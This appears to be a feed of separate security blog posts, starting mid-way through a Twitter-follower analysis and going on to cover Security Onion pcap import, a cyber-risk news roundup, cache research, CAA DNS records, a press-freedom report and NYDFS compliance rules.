Many of @niinisto’s last 5000 followers are new Twitter accounts, although not in as large a proportion as in the @realDonaldTrump case. In both of the above cases this is to be expected, since both accounts are recommended to new users of Twitter. Let’s look at the friends_count values for the above set.

Most common friends_count values seen amongst the new accounts following @niinisto

In some cases, clicking through the creation of a new Twitter account (next, next, next, finish) will create an account that follows 21 Twitter profiles. This can explain the high proportion of accounts in this list with a friends_count value of 21. However, we might expect to see the same (or an even stronger) pattern with the @realDonaldTrump account, and we don’t. I’m not sure why this is the case, but it could be that Twitter has some automation in place to auto-delete programmatically created accounts. If you look at the output of my script, you’ll see that between fetching the list of Twitter ids for the last 5000 followers of @realDonaldTrump and fetching the full Twitter User objects for those ids, 3 accounts “went missing” (hence the tool only collected data for 4997 accounts).

Finally, just for good measure, I ran the tool against my own account (@r0zetta).

Age ranges of new accounts following @r0zetta

Here you see a distribution that’s probably common for non-celebrity Twitter accounts. Not many of my followers have new accounts. What’s more, there’s absolutely no pattern in the friends_count values of these accounts:

Most common friends_count values seen amongst the new accounts following @r0zetta

Of course, there are plenty of other interesting analyses that can be performed on the data collected by this tool. Once the script has been run, all data is saved on disk as json files, so you can process it to your heart’s content without having to run additional queries against Twitter’s servers. As usual, have fun extending this tool to your own needs, and if you’re interested in reading some of my other guides or analyses, here’s a full list of those articles.
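
As a starting point for that further processing, here is a small sketch that reads the <target>_followers.json file written by the tool above and prints a few simple aggregates. The field names are standard Twitter User object fields that the script stores verbatim; adjust them to whatever you are interested in.

from collections import Counter
import io
import json
import sys

# Sketch: summarize a <target>_followers.json file produced by the script above.
# Usage: python summarize_followers.py realDonaldTrump_followers.json
if __name__ == "__main__":
    filename = sys.argv[1]
    with io.open(filename, "r", encoding="utf-8") as f:
        users = json.load(f)

    default_images = sum(1 for u in users if u.get("default_profile_image"))
    never_tweeted = sum(1 for u in users if u.get("statuses_count", 0) == 0)
    languages = Counter(u.get("lang") for u in users if u.get("lang"))

    print("Accounts analyzed: " + str(len(users)))
    print("Accounts still using the default profile image: " + str(default_images))
    print("Accounts that have never tweeted: " + str(never_tweeted))
    print("Most common interface languages: " + str(languages.most_common(5)))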

Wizards of Entrepreneurship – Business Security Weekly #75

This week, Michael is joined by Matt Alderman to interview Will Lin, Principal and Founding Investor at Trident Capital Security! In the Security News, Apptio raised $4.6M in equity, Morphisec raised $12M in Series B, & Dover Microsystems raised a $6M "Seed" round! Last but not least, part two of our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/BSWEpisode75

 

Visit https://www.securityweekly.com/bsw for all the latest episodes!

Top 5 Ways to Get Developer Application Security Buy-In [VIDEO]

The speed and scope of software development today are creating new challenges in ensuring the security of software. But they also create the opportunity to finally get application security right. Both the challenge and the opportunity stem, in part, from the fact that security is “shifting left.” The responsibility for ensuring the stability and security of software through production and customer usage is moving earlier in the cycle to include developers. This shift means security can get baked into code earlier, greatly increasing the chance of producing secure code without costly late-stage fixes.

But it also means a higher level of developer involvement in security, and often some work by the security team to get developers on board with the initiative. To ensure the success of your application security initiative, it’s essential to work closely with your developers so they understand the guidelines, strategies, policies, procedures and security risks involved with application security. What’s more, they must be prepared and equipped to operate securely within their particular development processes. Ryan O’Boyle, product security architect at CA Veracode, recently recorded a quick “chalkboard” video where he outlines our top 5 ways to get developer application security buy-in. Listen to Ryan as he walks you through:

Way No. 1: Timing: Bring in developers early in the planning process.

Way No. 2: Understanding: Learn about developers’ priorities and processes.

Way No. 3: Training: Most developers have no training on secure coding practices.

Way No. 4: Integrating: Work to integrate application security into existing developer tools and processes.

Way No. 5: Automating: Build tests into the pipeline through automation.

Watch Ryan’s short video to get all the details on these five tactics, and set yourself up for AppSec success.

Importing Pcap into Security Onion

Within the last week, Doug Burks of Security Onion (SO) added a new script that revolutionizes the use case for his amazing open source network security monitoring platform.

I have always used SO in a live production mode, meaning I deploy a SO sensor sniffing a live network interface. As the multitude of SO components observe network traffic, they generate, store, and display various forms of NSM data for use by analysts.

The problem with this model is that it could not be used for processing stored network traffic. If one simply replayed the traffic from a .pcap file, the new traffic would be assigned contemporary timestamps by the various tools observing the traffic.

While all of the NSM tools in SO have the independent capability to read stored .pcap files, there was no unified way to integrate their output into the SO platform.

Therefore, for years there was no way to import .pcap files into SO -- until last week!

Here is how I tested the new so-import-pcap script. First, I made sure I was running Security Onion Elastic Stack Release Candidate 2 (14.04.5.8 ISO) or later. Next I downloaded the script using wget from https://github.com/Security-Onion-Solutions/securityonion-elastic/blob/master/usr/sbin/so-import-pcap.

I continued as follows:

richard@so1:~$ sudo cp so-import-pcap /usr/sbin/

richard@so1:~$ sudo chmod 755 /usr/sbin/so-import-pcap

I tried running the script against two of the sample files packaged with SO, but ran into issues with both.

richard@so1:~$ sudo so-import-pcap /opt/samples/10k.pcap

so-import-pcap

Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/10k.pcap: The file appears to be damaged or corrupt
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)
Error while merging!

I checked the file with capinfos.

richard@so1:~$ capinfos /opt/samples/10k.pcap
capinfos: An error occurred after reading 17046 packets from "/opt/samples/10k.pcap": The file appears to be damaged or corrupt.
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)

Capinfos confirmed the problem. Let's try another!

richard@so1:~$ sudo so-import-pcap /opt/samples/zeus-sample-1.pcap

so-import-pcap

Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/zeus-sample-1.pcap: The file appears to be damaged or corrupt
(pcap: File has 1984391168-byte packet, bigger than maximum of 262144)
Error while merging!

Another bad file. Trying a third!

richard@so1:~$ sudo so-import-pcap /opt/samples/evidence03.pcap

so-import-pcap

Please wait while...
...creating temp pcap for processing.
...setting sguild debug to 2 and restarting sguild.
...configuring syslog-ng to pick up sguild logs.
...disabling syslog output in barnyard.
...configuring logstash to parse sguild logs (this may take a few minutes, but should only need to be done once)...done.
...stopping curator.
...disabling curator.
...stopping ossec_agent.
...disabling ossec_agent.
...stopping Bro sniffing process.
...disabling Bro sniffing process.
...stopping IDS sniffing process.
...disabling IDS sniffing process.
...stopping netsniff-ng.
...disabling netsniff-ng.
...adjusting CapMe to allow pcaps up to 50 years old.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2009-12-28/snort.log.1261958400

Import complete!

You can use this hyperlink to view data in the time range of your import:
https://localhost/app/kibana#/dashboard/94b52620-342a-11e7-9d52-4f090484f59e?_g=(refreshInterval:(display:Off,pause:!f,value:0),time:(from:'2009-12-28T00:00:00.000Z',mode:absolute,to:'2009-12-29T00:00:00.000Z'))

or you can manually set your Time Range to be:
From: 2009-12-28    To: 2009-12-29


Incidentally here is the capinfos output for this trace.

richard@so1:~$ capinfos /opt/samples/evidence03.pcap
File name:           /opt/samples/evidence03.pcap
File type:           Wireshark/tcpdump/... - pcap
File encapsulation:  Ethernet
Packet size limit:   file hdr: 65535 bytes
Number of packets:   1778
File size:           1537 kB
Data size:           1508 kB
Capture duration:    171 seconds
Start time:          Mon Dec 28 04:08:01 2009
End time:            Mon Dec 28 04:10:52 2009
Data byte rate:      8814 bytes/s
Data bit rate:       70 kbps
Average packet size: 848.57 bytes
Average packet rate: 10 packets/sec
SHA1:                34e5369c8151cf11a48732fed82f690c79d2b253
RIPEMD160:           afb2a911b4b3e38bc2967a9129f0a11639ebe97f
MD5:                 f8a01fbe84ef960d7cbd793e0c52a6c9
Strict time order:   True

That worked! Now to see what I can find in the SO interface.

I accessed the Kibana application and changed the timeframe to cover the time range of the trace.


Here's another screenshot. Again I had to adjust for the proper time range.


Very cool! However, I did not find any IDS alerts. This made me wonder if there was a problem with alert processing. I decided to run the script on a new .pcap:

richard@so1:~$ sudo so-import-pcap /opt/samples/emerging-all.pcap

so-import-pcap

Please wait while...
...creating temp pcap for processing.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2010-01-27/snort.log.1264550400

Import complete!

You can use this hyperlink to view data in the time range of your import:
https://localhost/app/kibana#/dashboard/94b52620-342a-11e7-9d52-4f090484f59e?_g=(refreshInterval:(display:Off,pause:!f,value:0),time:(from:'2010-01-27T00:00:00.000Z',mode:absolute,to:'2010-01-28T00:00:00.000Z'))

or you can manually set your Time Range to be:
From: 2010-01-27    To: 2010-01-28

When I searched the interface for NIDS alerts (after adjusting the time range), I found results:


The alerts show up in Sguil, too!



This is a wonderful development for the Security Onion community. Being able to import .pcap files and analyze them with the standard SO tools and processes, while preserving timestamps, makes SO a viable network forensics platform.

This thread in the mailing list is covering the new script.

I suggest running it on an evaluation system, probably in a virtual machine. I did all my testing on VirtualBox. Check it out!

Weekly Cyber Risk Roundup: W-2 Theft, BEC Scams, and SEC Guidance

The FBI is once again warning organizations that there has been an increase in phishing campaigns targeting employee W-2 information. In addition, this week saw new breach notifications related to W-2 theft, as well as reports of a threat actor targeting Fortune 500 companies with business email compromise (BEC) scams in order to steal millions of dollars.

The recent breach notification from Los Angeles Philharmonic highlights how W-2 information is often targeted during the tax season: attackers impersonated the organization’s chief financial officer via what appeared to be a legitimate email address and requested that the W-2 information for every employee be forwarded.

“The most popular method remains impersonating an executive, either through a compromised or spoofed email in order to obtain W-2 information from a Human Resource (HR) professional within the same organization,” the FBI noted in its alert on W-2 phishing scams.

In addition, researchers said that a threat actor, which is likely of Nigerian origin, has been successfully targeting accounts payable personnel at some Fortune 500 companies to initiate fraudulent wire transfers and steal millions of dollars. The examples observed by the researchers highlight “how attackers used stolen email credentials and sophisticated social engineering tactics without compromising the corporate network to defraud a company.”

The recent discoveries highlight the importance of protecting against BEC and other types of phishing scams. The FBI advises that the key to reducing the risk is understanding the criminals’ techniques and deploying effective mitigation processes, such as:

  • limiting the number of employees who have authority to approve wire transfers or share employee and customer data;
  • requiring another layer of approval such as a phone call, PIN, one-time code, or dual approval to verify identities before sensitive requests such as changing the payment information of vendors is confirmed;
  • and delaying transactions until additional verification processes can be performed.


Other trending cybercrime events from the week include:

  • Spyware companies hacked: A hacker has breached two different spyware companies, Mobistealth and Spy Master Pro, and provided gigabytes of stolen data to Motherboard. Motherboard reported that the data contained customer records, apparent business information, and alleged intercepted messages of some people targeted by the malware.
  • Data accidentally exposed: The University of Wisconsin – Superior Alumni Association is notifying alumni that their Social Security numbers may have been exposed because some individuals' ID numbers were the same as their Social Security numbers and those ID numbers were shared with a travel vendor. More than 70 residents of the city of Ballarat had their personal information exposed when an unredacted attachment listing individuals who had made submissions to the review of the City of Ballarat's CBD Car Parking Action Plan was posted online. Chase said that a "glitch" led to some customers' personal information being displayed on other customers' accounts.
  • Notable data breaches: The compromise of a senior moderator’s account at the HardwareZone Forum led to a breach affecting 685,000 user profiles, the site’s owner said. White and Bright Family Dental is notifying patients that it discovered unauthorized access to a server that contained patient personal information. The University of Virginia Health System is notifying 1,882 patients that their medical records may have been accessed due to discovering malware on a physician’s device. HomeTown Bank in Texas is notifying customers that it discovered a skimming device installed on an ATM at its Galveston branch.
  • Other notable events: The Colorado Department of Transportation said that its Windows computers were infected with SamSam ransomware and that more than 2,000 computers were shut down to stop the ransomware from spreading and investigate the attack. The city of Allentown, Pennsylvania, said it is investigating the discovery of malware on its systems, but there is no reason to believe personal data has been compromised. Harper’s Magazine is warning its subscribers that their credentials may have been compromised.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.

[Chart: top trending cybercrime targets]

Cyber Risk Trends From the Past Week


The U.S. Securities and Exchange Commission (SEC) issued updated guidance on how public organizations should respond to data breaches and other cybersecurity issues last week.

The document, titled “Commission Statement and Guidance on Public Company Cybersecurity Disclosures,” states that “it is critical that public companies take all required actions to inform investors about material cybersecurity risks and incidents in a timely fashion, including those companies that are subject to material cybersecurity risks but may not yet have been the target of a cyber-attack.”

The SEC also advised that directors, officers, and other corporate insiders should not trade a public company’s securities if they are in possession of material nonpublic information — an issue that arose when it was reported that several Equifax executives sold shares in the days following the company’s massive data breach. The SEC said that public companies should have policies and procedures in place to prevent insiders from taking advantage of insider knowledge of cybersecurity incidents, as well as to ensure a timely disclosure of any related material nonpublic information.

“I believe that providing the Commission’s views on these matters will promote clearer and more robust disclosure by companies about cybersecurity risks and incidents, resulting in more complete information being available to investors,” said SEC Chairman Jay Clayton.  “In particular, I urge public companies to examine their controls and procedures, with not only their securities law disclosure obligations in mind, but also reputational considerations around sales of securities by executives.”

The SEC unanimously approved the updated guidance; however, Reuters reported that support from the Democratic commissioners was reluctant, as they had called for much more rigorous rulemaking to be put in place.

Ground Control to Major Thom

I recently finished a book called “Into the Black” by Roland White, charting the birth of the space shuttle from the beginnings of the space race through to its untimely retirement. It is a fascinating account of why “space is hard” and exemplifies the need for compromise and balance of risks in even the harshest … Read More

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme (https://ssiclops.eu/). The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter if they are geographically collocated or spread out, belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforce legal and security constraints, and minimize the overall resource consumption. In such a federation, individual enterprises will be able to dynamically scale in/out their cloud services: because they dynamically offer own spare resources (when available) and take in resources from others when needed. This allows maximizing own infrastructure utilization while minimizing excess capacity needs for each federation member.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telekom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.
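To make the starting point concrete, here is a minimal sketch (TypeScript, not F-Secure's actual code) of an LRU cache that also honours per-item TTLs, in the spirit of the proxy-node behaviour described above:

// A Map iterates in insertion order, which keeps the LRU bookkeeping simple:
// the first key is always the least recently used one.
class TtlLruCache<K, V> {
  private entries = new Map<K, { value: V; expiresAt: number }>();

  constructor(private capacity: number) {}

  get(key: K): V | undefined {
    const entry = this.entries.get(key);
    if (!entry) return undefined;
    if (Date.now() > entry.expiresAt) {
      this.entries.delete(key);      // expired verdicts count as misses
      return undefined;
    }
    this.entries.delete(key);        // re-insert to mark as most recently used
    this.entries.set(key, entry);
    return entry.value;
  }

  set(key: K, value: V, ttlMs: number): void {
    if (this.entries.has(key)) this.entries.delete(key);
    this.entries.set(key, { value, expiresAt: Date.now() + ttlMs });
    if (this.entries.size > this.capacity) {
      // evict the least recently used entry
      const oldest = this.entries.keys().next().value as K;
      this.entries.delete(oldest);
    }
  }
}

A proxy node would consult such a cache first and only query the central repository on a miss or an expired entry.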

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger's team at Deutsche Telekom to evaluate whether alternative caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited "predictive" features for determining which items might be queried in the future. The results look promising, and we're planning on bringing the new mechanism into our production proxy nodes in the near future.
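As a rough illustration of that direction, the sketch below counts frequencies over a sliding window of recent requests so that stale popularity decays; it only conveys the windowed-LFU idea and is not the algorithm that actually shipped.

class WindowedLfuCache<K, V> {
  private store = new Map<K, V>();
  private window: K[] = [];                       // the last N requested keys

  constructor(private capacity: number, private windowSize = 10_000) {}

  private frequency(key: K): number {
    return this.window.reduce((n, k) => (k === key ? n + 1 : n), 0);
  }

  get(key: K): V | undefined {
    this.window.push(key);
    if (this.window.length > this.windowSize) this.window.shift();
    return this.store.get(key);
  }

  set(key: K, value: V): void {
    if (!this.store.has(key) && this.store.size >= this.capacity) {
      // evict the cached key that was requested least often within the window
      let victim: K | undefined;
      let lowest = Number.POSITIVE_INFINITY;
      for (const k of this.store.keys()) {
        const f = this.frequency(k);
        if (f < lowest) { lowest = f; victim = k; }
      }
      if (victim !== undefined) this.store.delete(victim);
    }
    this.store.set(key, value);
  }
}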


SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS


It's been a long time since I last audited someone's DNS zone file, but recently, while checking a client's DNS configuration, I was surprised to find the CAA records set almost at random, so to speak. I discussed this with the administrator and was surprised to learn that he had no clue what CAA is, how it works, or why it is so important to configure it correctly. That made me wonder how many of us actually know about it, and how it can be a savior if someone attempts to obtain an SSL certificate for your domain.

What is CAA?

CAA, or Certificate Authority Authorization, is a record that identifies which certificate authorities (CAs) are allowed to issue certificates for the domain in question. It is declared via the CAA record type in DNS, is publicly viewable, and can be verified by a certificate authority before a certificate is issued.

Brief Background

While the first draft was written by Phillip Hallam-Baker and Rob Stradling back in 2010, work accelerated over the last five years due to CA-related incidents and attacks. The first CA subversion occurred in 2001, when VeriSign issued two certificates to an individual claiming to represent Microsoft; these were named "Microsoft Corporation" and could have been used to spoof identity and deliver malicious updates. Then, in 2011, fraudulent certificates were issued by Comodo[1] and DigiNotar[2] after they were attacked by Iranian hackers (more on the Comodo attack and the Dutch DigiNotar attack), with evidence of their use in a MITM attack in Iran.

Further, in 2012, Trustwave issued[3] a sub-root certificate that was used to sniff SSL traffic in the name of transparent traffic management. So it's about time CAs are restricted, or whitelisted, at the domain level.

What if no CAA record is configured in DNS?

Simply put, the CAA record should be configured to announce which certificate authorities are permitted to issue a certificate for your domain. If no CAA record is provided, any CA can issue a certificate for your domain.

CAA is a good practice for restricting which CAs have the power to legally issue certificates for your domain. It's like whitelisting them for your domain!

The process now mandates[4] that a certificate authority (yes, it is mandatory now!) query DNS for your CAA record; a certificate can only be issued for your hostname if either no record is available or that CA has been "whitelisted". A CAA record sets the rules for the parent domain, and those rules are inherited by sub-domains (unless otherwise stated in the DNS records).

Certificates authorities interpret the lack of a CAA record to authorize unrestricted issuance, and the presence of a single blank issue tag to disallow all issuance.[5]

CAA record syntax/ format

The CAA record has the following format: <flag> <tag> <value>, where the fields have the following meaning:

Field Usage
flag An integer (0-255) as defined in RFC 6844[6]; it currently carries the critical flag.[7]
tag An ASCII string (issue, issuewild, or iodef) that identifies the property represented by the record.
value The value of the property defined in <tag>.

The tags defined in the RFC have the following meaning and understanding with the CA records,

  • issue: explicitly authorizes a single certificate authority to issue any type of certificate for the domain in scope.
  • issuewild: explicitly authorizes a single certificate authority to issue only wildcard certificates for the domain in scope.
  • iodef: specifies where certificate authorities should report requests or issuances that violate the CAA policy defined in the DNS records (options: mailto:, http://, or https://).
DNS Software Support

As per an excerpt from Wikipedia[8]: CAA records are supported by BIND (since version 9.10.1B), Knot DNS (since version 2.2.0), ldns (since version 1.6.17), NSD (as of version 4.0.1), OpenDNSSEC, PowerDNS (since version 4.0.0), Simple DNS Plus (since version 6.0), tinydns, and Windows Server 2016.
Many hosted DNS providers also support CAA records, including Amazon Route 53, Cloudflare, DNS Made Easy, and Google Cloud DNS.

Example: (my own website DNS)

As per my policy, I have configured ONLY "letsencrypt.org" to issue certificates, but due to Cloudflare Universal SSL support the following certificate authorities get configured as well:

  • 0 issue "comodoca.com"
  • 0 issue "digicert.com"
  • 0 issue "globalsign.com"
  • 0 issuewild "comodoca.com"
  • 0 issuewild "digicert.com"
  • 0 issuewild "globalsign.com"


Also, configured iodef for violation: 0 iodef "mailto:hello@cybersins.com"
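To check a domain's CAA policy from code rather than with dig, a small sketch like the one below works on recent Node.js runtimes, where dns.promises.resolveCaa is available; the domain is simply the one from the example above.

import { resolveCaa } from "node:dns/promises";

async function checkCaa(domain: string): Promise<void> {
  try {
    const records = await resolveCaa(domain);
    // each record carries `critical` plus one property such as issue, issuewild or iodef
    for (const record of records) console.log(domain, record);
  } catch (err) {
    const code = (err as NodeJS.ErrnoException).code;
    if (code === "ENODATA" || code === "ENOTFOUND") {
      console.log(`${domain}: no CAA record found, so any CA may issue certificates`);
    } else {
      throw err;
    }
  }
}

checkCaa("cybersins.com").catch(console.error);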

How's the WWW doing with CAA?

After this auditing exercise I was curious to see how the top 10,000 Alexa websites are doing with CAA, and the results surprised me: only 4% of the top 10K websites have a CAA DNS record.

[Pie chart: share of the top 10,000 Alexa websites with a CAA DNS record]

[Update 27-Feb-18]: This pie chart was updated with correct numbers. Thanks to Ich Bin Niche Sie for identifying the calculation error.

We still have a long way to go with new security flags and policies like the CAA DNS record, the "security.txt" file, and so on, and I shall keep covering these topics to evangelize security in every possible way without disrupting business. Remember to always work hand in hand with the business.

Stay safe, and tuned in.


  1. Comodo CA attack by Iranian hackers: https://arstechnica.com/information-technology/2011/03/independent-iranian-hacker-claims-responsibility-for-comodo-hack/ ↩︎

  2. Dutch DigiNotar attack by Iranian hackers: https://arstechnica.com/information-technology/2011/08/earlier-this-year-an-iranian/ ↩︎

  3. Trustwave Subroot Certificate: http://www.h-online.com/security/news/item/Trustwave-issued-a-man-in-the-middle-certificate-1429982.html ↩︎

  4. CAA Checking Mandatory (Ballot 187 results) 2017: https://cabforum.org/pipermail/public/2017-March/009988.html ↩︎

  5. Wikipedia Article: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization ↩︎

  6. IETF RFC 6844 on CAA record: https://tools.ietf.org/html/rfc6844 ↩︎

  7. The confusion of critical flag: https://tools.ietf.org/html/rfc6844#section-7.3 ↩︎

  8. Wikipedia Support Section: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization#Support ↩︎

Former Trump adviser Sebastian Gorka insults, threatens, and attacks journalists

Screengrab from a video shot by Daily Beast reporter Max Tani

“You are the epitome of fake news,” former Trump White House adviser Sebastian Gorka told a journalist yesterday. “You are wasting your time here, cause we’re patriots here.” In an audio recording obtained by Freedom of the Press Foundation, he continued, “We don’t want to destroy the country, or hang out with people like yourself who don’t like this country.”

Gorka seemed to spend the first two days of the Conservative Political Action Conference insulting, taunting, threatening, and—in at least one case—physically attacking journalists.

ThinkProgress reporter Kira Lerner had approached the former Trump White House adviser to ask him about a video posted on Twitter that had quickly gone viral earlier that morning. In it, Gorka can be seen shoving Mediaite reporter Caleb Ecarma, raising his hand as if to strike him, and then telling him to “fuck off.”

Lerner’s colleague at ThinkProgress, Addy Baird, had also requested comment from Gorka earlier in the day about the altercation with Ecarma. When she told Gorka that she was with ThinkProgress, he told her, “ThinkProgress isn’t reporters. I’m not interested.” He started walking away, but then turned around and whistled at her. “I have a comment for you,” Baird says Gorka told her. “You’re as much of a reporter as he is,” referring to Caleb Ecarma.

Gorka refused to answer Lerner’s and Baird’s questions because of the media outlet they represent. In fact, according to numerous reporters present at CPAC yesterday near Washington, D.C., Gorka denied interviews to any progressive news organization that approached him.

He did, however, speak with the Daily Signal, the news organization of right-wing The Heritage Foundation. The Daily Beast reported that although Gorka denied interviews with the Beast and Comedy Central’s The Opposition, he told a representative of WorldNetDaily to text him.

HuffPost politics reporter Igor Bobic tweeted that he “nearly got into a fight with Sebastian Gorka at a bar at CPAC” after asking him why he blocks people on Twitter. (However, Gorka’s allies present at CPAC have contested Bobic’s claim in replies on Twitter.)

On the second day of CPAC on Friday, Kira Lerner approached Gorka to again ask him about the altercation with Ecarma. “I’m asking you for comment on the video of you assaulting a reporter,” she can be heard saying in audio obtained by Freedom of the Press Foundation. After initially refusing to speak to her, calling her an illegitimate journalist because she works for ThinkProgress, he then claimed that Ecarma “wanted a fight.”

“He’s a lunatic,” Gorka responds. “He said he wanted to have a pistol duel with me in D.C. He’s unhinged, and I have the emails, and I’m going to put out a restraining order on him, because he stalked me in Florida. He’s not mentally fit.”

Caleb Ecarma told Freedom of the Press Foundation that when he bumped into Gorka at the Turning Point USA Student Action Summit in Florida last December, Gorka lunged at him and had to be pulled off by security. The tension between the two began months earlier in October, when Ecarma got into a heated email exchange with Gorka after accusing him on Twitter of illegally parking his car.

Sebastian Gorka’s advisory role to President Trump was deeply controversial—he allegedly has ties to white supremacist and Hungarian fascist groups. While still working for the White House, he accused BBC radio journalists of being part of a “fake news industrial complex.”  

After he left the White House last August, he announced that he would be returning to Breitbart News and later accepted a position as a national security analyst for Fox News. But despite working for two media organizations, Gorka continues to aggressively berate and attempt to intimidate journalists.

It is troubling enough when a public figure like Gorka attacks or insults reporters with any media outlet that he deems “irrelevant” or “fake news”, or those that he claims hate America. But Gorka also has the ear of the President, who has spent his first year in office incessantly attacking the press and threatening news organizations and journalists with lawsuits over coverage he doesn’t like. Gorka’s treatment of the press at CPAC is emblematic of a worrying and callous disregard for the First Amendment embodied by many public figures close to the Trump Administration.

Sebastian Gorka did not immediately respond to a request by Freedom of the Press Foundation for comment.

Pindrop® Passport | Authentication 101

It is obvious that fraudsters’ sophistication is evolving, surpassing security measures in pursuit of a single end goal: financial gain. Worse, consumers are unaware of the effects of social media, with 61% admitting to sharing answers to security questions on their online profiles. This percentage rises to 80% for 18-24 year olds, making them especially easy targets for fraudsters. Additionally, personally identifiable information (PII) can be bought on the black market, further enabling fraudsters to bypass security measures.

This easy access to information has rendered traditional call center identity solutions, including knowledge-based authentication (KBA) questions, ANI verification, caller ID, and standalone voice biometric solutions, ineffective and inefficient. Legacy call center security solutions are slow to provide information, increasing average call handle times and ultimately impacting the overall customer experience. In response to these insufficiencies, new technologies are pushing authentication to new bounds, characterized by behavior and voice.

As we move toward an economy dictated by conversational commerce, voice biometric solutions are directly impacting authentication. The popularity of transactions made through voice-led devices, such as Amazon Alexa and Google Home, has created further interest in integrating voice into enterprises. The voice-led revolution has allowed voice biometric solutions to step in as an alternative method of authentication. However, the strong dependency on a single type of technology has left enterprises open to fraudulent activity.

Due to the relentless nature of fraudsters and their continued attempts to work around security measures, enterprises must reexamine and protect all vulnerabilities. Standalone voice biometric solutions are not enough to authenticate callers, and until now, voice biometric engines have not accounted for voice aging. Enterprises should enact a layered approach, using voice biometrics as part of a multi-factor solution.

Pindrop® Passport combines our proprietary Deep Voice™ biometric engine with Phoneprinting™ and Toneprinting™ technologies to provide passive intelligence to authenticate legitimate callers in real-time. Learn more.

The post Pindrop® Passport | Authentication 101 appeared first on Pindrop.

NYDFS Cybersecurity Regulation Transition Period Ends

NYDFS Cybersecurity Regulation Compliance

March 1, 2018 marks the end of the one-year transition period for the New York Department of Financial Services (NYDFS) cybersecurity regulation. The passage of this date means affected organizations — including banks, insurance companies, and other financial services companies licensed by or operating in New York State — must be in compliance with a raft of security rules intended to protect non-public information from cyberattacks and data loss.

The landmark NYDFS rules (officially known as 23 NYCRR Part 500) go into effect on a rolling basis, to give covered entities time to upgrade their security policies and procedures to meet compliance. The initial set of compliance requirements focus on risk assessment and reporting, penetration testing, employee training and monitoring, and access management.

According to the NYDFS, covered entities must be in compliance with sections 500.04(b), 500.05, 500.09, 500.12, and 500.14(b), by March 1, 2018. Additional requirements will go into effect in September 2018, including requirements for securing internally developed and third-party applications.

Below we offer a summary of the NYDFS rules covered entities must comply with as of March 1, 2018.

Section 500.04: Chief Information Security Officer

The chief information security officer (CISO) for covered entities must give an annual report to the organization's board of directors, or a senior officer if no such governing body exists. The written report should cover the overall effectiveness of the cybersecurity program, material cybersecurity risks, and material cybersecurity events within the period covered by the report.

Section 500.05: Penetration Testing and Vulnerability Assessments

Covered entities must conduct monitoring and testing to assess the effectiveness of their security. Security programs should include continuous monitoring for security events, as well as penetration tests and vulnerability assessments. Penetration testing should be conducted at least annually, based on the entity's risk assessment. Vulnerability assessments, conducted at least bi-annually, should include systematic scans or reviews to find publicly known vulnerabilities in the entity's information systems.

Section 500.09: Risk Assessment

Covered entities must conduct periodic risk assessments to inform the design of the cybersecurity program. These risk assessments must consider the impact of evolving technologies and emerging threats. They must be conducted in accordance with written policies and procedures that address how identified risks will be mitigated or accepted and how the entity will respond to them.

Section 500.12: Multi-Factor Authentication

Security controls, such as multi-factor authentication, must be in place to prevent unauthorized users from accessing non-public information and systems.

Section 500.14: Training and Monitoring

Covered entities must put in place policies and procedures for monitoring the activity of authorized users, and for detecting unauthorized access to non-public information and information systems. They must also provide periodic cybersecurity awareness training for employees.

Coming in September 2018: Application Security Requirements

Among the requirements for compliance going into effect in September 2018, covered entities must have policies and procedures in place for securing the software applications they develop or purchase. The regulation requires organizations to implement standards to ensure the use of secure coding best practices for internally developed applications, and procedures for assessing or testing third-party software used in the organization's IT environment.

How CA Veracode Can Help

You should check with your compliance and legal departments for complete information on how you may be required to comply. The following CA Veracode products and services may help you secure your internally developed and third-party software, as part of a complete cybersecurity program.

